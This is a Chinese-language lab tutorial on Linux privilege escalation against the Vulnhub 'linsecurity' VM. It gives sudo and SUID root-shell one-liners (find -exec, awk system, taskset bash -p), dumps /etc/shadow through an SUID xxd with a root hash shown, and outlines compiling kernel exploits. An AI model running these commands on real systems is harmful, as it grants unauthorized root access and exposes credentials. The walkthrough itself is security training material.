linux提权

目录

一、linux提权靶场下载与安装

二、基础提权 

 1.sudo提权

 2.suid提权

3.taskset执行bash 

三、内核提权 


相关网站

https://gtfobins.github.io/#+sudo

https://blog.csdn.net/weixin_43873557/article/details/113784146

一、linux提权靶场下载与安装

#下载链接
https://www.vulnhub.com/entry/linsecurity-1,244/

用户名密码:bob/secret

#安装与配置
1.修改默认键盘布局[默认不是美式键盘]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符号是shift+2]

vim /etc/default/keyboard
[讲XKBLAYOUT改的值为us]

setupcon

2.配置网卡[Ubuntu 18通过netplan设置网络]
vim /etc/netplan/50-cloud-init.yaml
[将enp0s3改为ens33]

netplan apply

二、基础提权 

 1.sudo提权

sudo权限是root把本来只能超级用户执行的命令赋予普通用户执行

1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bash
sudo -i

 2.suid提权

suid简介:SUID这个是uid +s的组合,s指的是特殊权限。一般情况下,用户的权限是3位,比如0755这样的,特殊权限默认没有配置,但是如果超级管理员希望用户在执行一些特殊权限文件时,拥有root的权限,就会配置特殊权限

使用find命令快速查找所有suid文件

find / -user root -perm -4000 -print 2>/dev/null

xxd访问/etc/shadow

-rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

 itservices组具有执行权限,通过/etc/group发现susan用户属于itservices用户组,利用4.隐藏文件发现的密码登录susan用户,进行提权

cd home/susan
susan@linsecurity:/home/bob$ xxd "/etc/shadow" |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

3.taskset执行bash 

taskset 是一个用于将进程绑定到特定的CPU核心上的命令

taskset 1 /bin/bash -p

三、内核提权 

将linux内核提权速查脚本移到Linux系统中

linux提权_第1张图片

查询该文件

 

进行解压缩 

linux提权_第2张图片 

进入解压后的文件,并执行里面的后缀为.sh的文件

linux提权_第3张图片 成功后就可以查看推荐的漏洞

linux提权_第4张图片

 将推荐的漏洞下载到本地,复制到Linux系统中,进行解压缩

linux提权_第5张图片

进入解压后的文件

linux提权_第6张图片

 存在makefile,进行编译make

linux提权_第7张图片

 查看编译后的文件,发现新增,进行执行该文件

linux提权_第8张图片

 运行文件,不能成功,则换其他漏洞

linux提权_第9张图片 

你可能感兴趣的:(内网渗透,linux,运维,服务器)